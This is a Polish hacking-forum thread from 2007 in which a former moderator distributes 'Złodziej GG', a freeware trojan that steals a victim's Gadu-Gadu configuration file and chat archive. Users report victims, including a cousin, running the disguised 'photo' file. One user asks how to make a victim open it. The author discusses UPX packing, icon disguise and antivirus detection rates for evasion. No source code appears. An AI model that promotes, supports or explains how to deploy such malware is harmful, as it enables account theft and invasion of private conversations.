Złodziej GG v1.0 [DOWNLOAD]

Status
Zamknięty.

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Originally posted by kazio199
wszystko cacy działa tylko jedno pytanie !!! jak wydłuzyc działanie pliku sgg chodzi oto aby zrobił kilka screen'ów
Nie ma takiej opcji to tylko jest dodatek [robienie screena]. Złodziej GG jest zupełnie darmową wersją http://pl.wikipedia.org/wiki/Freeware ale każdego kto chce użyć programu/przetestować prosił bym o kliknięcie w brzuszek pajacyka http://www.pajacyk.pl . Złodziej GG jak sama nazwa wskazuje wykrada config.dat i archiwum z folderu gadu-gadu ofiary
smile.gif

Zrobiłem ten program dla niedoświadczonych userów forum, którzy zadają dużo podobnych pytań jak wejść na czyjeś gg, jak wykraść archiwum. Bardziej zaawansowani myślę
że sami by umieli taki program sobie napisać bez żadnego problem.

Nie biorę odpowiedzialności za nie zgodne
z prawem wykorzystanie programu!
Używasz na własną odpowiedzialność!



I nie piszcie jakie hasło bo wszystko pisze w temacie
Dla przypomnienia (wpisywać ręcznie nie kopiować!) hasło to:
[email protected]
Pozdrawiam Smark.
 

sirkus

Użytkownik
Dołączył
Sierpień 28, 2007
Posty
5
wszystko ładnie śmiga, link działa, hasło poprawne, fajny prigramik

dzięki Dark Smark za wstawke
<
 

Gebels

Użytkownik
Dołączył
Lipiec 23, 2007
Posty
57
Złodziej ma taki mały błąd. Jak się wybierze ikonkę, po czym kliknie na generuj, to sewrer jest przenoszony do folderu w którym jest ikonka, a nie folder Złodzieja.


A tak to wszystko super ;]


Aaa, jest możliwość wrzucenia tej wersji nie wykrywalnej przez jeden AV (nie spakowanej UPXem)?
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Originally posted by Gebels
Złodziej ma taki mały błąd. Jak się wybierze ikonkę, po czym kliknie na generuj, to sewrer jest przenoszony do folderu w którym jest ikonka, a nie folder Złodzieja.

A tak to wszystko super ;]
U mnie po zmianie ikony nie działał poprawnie program, jest info w pliku !CZYTAJ!.text

UWAGA!
Zmiana ikony serwera złodzieja nie działa!
Ponieważ został spakowany upx.[/b]
 

Gebels

Użytkownik
Dołączył
Lipiec 23, 2007
Posty
57
Originally posted by Dark Smark+--><div class='quotetop'>CYTAT(Dark Smark)</div>
<!--QuoteBegin-Gebels
Złodziej ma taki mały błąd. Jak się wybierze ikonkę, po czym kliknie na generuj, to sewrer jest przenoszony do folderu w którym jest ikonka, a nie folder Złodzieja.

A tak to wszystko super ;]
U mnie po zmianie ikony nie działał poprawnie program, jest info w pliku !CZYTAJ!.text

UWAGA!
Zmiana ikony serwera złodzieja nie działa!
Ponieważ został spakowany upx.[/b]
[/b]

To jak nie można zmianiać ikonki to moze wrzucisz jak możesz wersję bez UPX (pisałeś coś o niej wcześniej)? Serwer i tak jest bardzo mały a kazdy miałby wtedy wybór.
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Gebels . Teraz oficjalnie mówie że będzie udostępniona wersja MAX. Wcale nie wykrywalna ale więcej zajmuje. A serwer nie jest mały
smile.gif
jest olbryzmi. Bez tego upx zmiana ikony będzie działać poprawnie.


Jakieś pytania? Pisać do mnie na PW (tylko a propos programu złodziej gg).



Pozdrawiam Smark.
 

lisc33

Użytkownik
Dołączył
Sierpień 31, 2007
Posty
9
mam to samo ffire walla wylaczyla ofiara muj kuzyn ale jakos sie po 1 g niesciaglo :whoeva:
 

BossQ

Użytkownik
Dołączył
Kwiecień 23, 2007
Posty
11
ofiara napewno odpaliła plik bo pisała ze "zdjecie" sie niotwiera:D kiedy dojdzie?? :faja:
 

BossQ

Użytkownik
Dołączył
Kwiecień 23, 2007
Posty
11
mam o2
<
apropo rozmiaru pliku sie zgadza.... jednak rozmiar na dysku jest inny ;/
przeszkadza to w czymś?

wczoraj elegancko przyszedł e-mail a tutaj zadyszka;/

dojdzą te pliki czy przepadły??

dopiero inna osoba odebrała plik i doszło a co z tamtym??
 

romciomek

Użytkownik
Dołączył
Wrzesień 5, 2007
Posty
1
hej co ja mam zrobić z tem programem wygenerowac plik i wysłac do ofiary? a jak ja mam ją zmusić żeby go otworzyła? jakieś porady proszę
 

lisc33

Użytkownik
Dołączył
Sierpień 31, 2007
Posty
9
hehe dzial fajny program
smile.gif
troche glupie jest to ze w archiwum jest napisane tylko to co ofiara pisala :whoeva: ale pozatym jest fajny programik
smile.gif
 

Gebels

Użytkownik
Dołączył
Lipiec 23, 2007
Posty
57
Originally posted by lisc33
troche glupie jest to ze w archiwum jest napisane tylko to co ofiara pisala :whoeva: ale pozatym jest fajny programik
smile.gif

To nie jest wina Złodzieja. Przekopiuj własne archiwum do jakiegoś drugiego konta, będziesz miał tak samo pomieszane rozmowy. I nie jest tylko to co pisała ofiara, tylko rozmowa pod jest rozmową rozmówcy (jakoś tak lol) :yes: To wina GG, ciekawe czym to jest spowodowane, zapewne musi być jeszcze jakiś plik który odpowiada za chronologię archiwum. Prawidłowo rozmieszcza rozmowy tylko moje własne archiwum na moim koncie.
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Originally posted by lisc33
hehe dzial fajny program
smile.gif
troche glupie jest to ze w archiwum jest napisane tylko to co ofiara pisala :whoeva: ale pozatym jest fajny programik
smile.gif
Pierwotnie miał być tylko do wykradania config.dat.
Szkoda że już tak podskoczyła wykrywalność.

Plik sgg.exe otrzymany 2007.09.06 16:06:16 (CET)
Obecny status: Ładowanie ... w kolejce oczekuje skanowanie zakończono NIE ZNALEZIONO ZATRZYMANE
Wynik: 7/32 (21.88%)

//Av wykrywa już.
AntiVir TR/Delphi.Downloader.Gen
BitDefender BehavesLike:Win32.SMTP-Mailer
eSafe suspicious Trojan/Worm
Ikarus Backdoor.Win32.GrayBird.oc
Panda Suspicious file
Prevx1 Generic.Malware
Webwasher-Gateway Trojan.Delphi.Downloader.Gen


Zaznaczyłem przy skanowaniu by nie rozsyłało wyników do producentów AV.
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
@UP 31337
Chyba nie czytałeś na skrzynce e-maila co jest zostawiony tam :].
Niestety nie da się i tak prościej zrobić w konfiguracji bo nawet jak źródło zakoduje się można wysniffować dane.

Originally posted by 31337
Nie bierz sie za rzeczy o których nie masz bladego pojęcia.
W jakiej szkole średniej uczą delphi?
<
Bo ja rzeczywiście mam blade pojęcie, nie pisze ctrl+c ctrl+v tylko z główki a nie jak inni
smile.gif

Nie spotkałem się bo to środowisko nie ma przyszłości.
Delphi tylko jest dobre do pisania szybko aplikacji tak samo c++ builder firmy borland.

Podziękujcie koledze projekt zamknięty.

Oficjalnie mówię że wynoszę się z forum haker.com.pl.
Widać jak poziom intelektualny userów takich jak 31337 podupada.
Chociaż nie wynoszę się ze względu na niego tylko userów o mózgu typu "komputer jest do grania, nic więcej" żeby nie było
smile.gif


Kiedyś tu było bardzo dużo userów z wiedzą ponad przeciętną. Nawet osoby o małej wiedzy co potrzebowały pomocy były inne. Teraz widać.
Jest na tym forum jeszcze bardzo wiele do zmienienia.
Życzę powodzenia moderatorom w walce ze złem.


User M1ch00 też opuścił to forum a jego wiedza wykraczała ponad większość userów.


//Modzi temat do usunięcia, możecie mnie nawet zbanować za ten off-topic w tym poście.



PROGRAM Z DNIEM DZISIEJSZYM PRZESTAJE DZIAŁAĆ PRZEZ PANA 31337

Pozdrawiam i żegnam Smark.
 
3

31337

Gość
Niestety nie da się i tak prościej zrobić w konfiguracji bo nawet jak źródło zakoduje się można wysniffować dane.[/b]
Jesteś pewien?
Zaraz napisze bezpieczną wersje < 8kB.
3 tryby wysyłania: gg, smtp, bezposrednio.
 
Status
Zamknięty.
Do góry Bottom